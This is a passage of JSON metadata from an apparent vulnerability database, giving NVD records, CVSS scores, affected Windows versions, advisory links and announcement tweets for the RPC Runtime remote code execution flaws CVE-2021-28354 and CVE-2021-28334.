"extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354"}], "hash": "1f7534f37b987cad4b8d4be3725e3aa1dc82f4e2ec135de7111f2968ac9145b6", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "09af14565aac6dee261d02e65f7d81aa", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "18e52b042ed4405f20326b67fcaa9faa", "key": "references"}, {"hash": "e195250be5606f3f3d5e86f12699c220", "key": "title"}, {"hash": "7fa0cb2cd569ac2e039caf01796db362", "key": "extraReferences"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "541819947641a3bbc0088316ab5b0442", "key": "href"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "dd4362b90074f3d54752c56f334dcc2f", "key": "description"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "932da8db5e6348cc13f36dfa8966b423", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28354", "id": "CVE-2021-28354", "immutableFields": [], "lastseen": "2021-04-17T09:58:44", "modified": "2021-04-16T21:08:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354"], "reporter": "cve@mitre.org", "title": "CVE-2021-28354", "type": "cve", "viewCount": 3}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-17T09:58:44"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28354"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28354"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976171618308", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976171618308", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383193614709313538", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383193614709313538", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354"}], "hash": "b4a55e990fbeb2bca2dbd2e50630f785e3c35955af5731ed03b642cd6343d93d", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "09af14565aac6dee261d02e65f7d81aa", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "18e52b042ed4405f20326b67fcaa9faa", "key": "references"}, {"hash": "e195250be5606f3f3d5e86f12699c220", "key": "title"}, {"hash": "9323e4a50e5203ab0445b1596f38c789", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "541819947641a3bbc0088316ab5b0442", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "dd4362b90074f3d54752c56f334dcc2f", "key": "description"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28354", "id": "CVE-2021-28354", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354"], "reporter": "cve@mitre.org", "title": "CVE-2021-28354", "type": "cve", "viewCount": 0}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "09af14565aac6dee261d02e65f7d81aa"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "dd4362b90074f3d54752c56f334dcc2f"}, {"key": "extraReferences", "hash": "7fa0cb2cd569ac2e039caf01796db362"}, {"key": "href", "hash": "541819947641a3bbc0088316ab5b0442"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "932da8db5e6348cc13f36dfa8966b423"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "18e52b042ed4405f20326b67fcaa9faa"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "e195250be5606f3f3d5e86f12699c220"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ee10991b5bed321d3dc2c7598434e8f18b609eca31d52536cfd6076b084619c9", "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28354"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 4, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976171618308", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976171618308", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383193614709313538", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383193614709313538", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28334", "bulletinFamily": "NVD", "title": "CVE-2021-28334", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T19:17:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28334", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334"], "cvelist": ["CVE-2021-28334"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28334"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28334"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334"}], "hash": "e326eca2ebbe6a4a6e30260876ae9a3a48fd4f9462d1bbe24159040462303314", "hashmap": [{"hash": "7ac4e4098c4cd2fc04dd3bf4eee90edf", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "5994be0882256a33d08093d7d70cfb2f", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "f345314a8c25cf1070466e4130628707", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5bd79a59b38bcbf1f5bd0f23b27d28a0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "ec21884b25163cbc8fb0439362ea4ad8", "key": "title"}, {"hash": "c11c7138ce1c569465cc356eec10f4f8", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28334", "id": "CVE-2021-28334", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334"], "reporter": "cve@mitre.org", "title": "CVE-2021-28334", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", 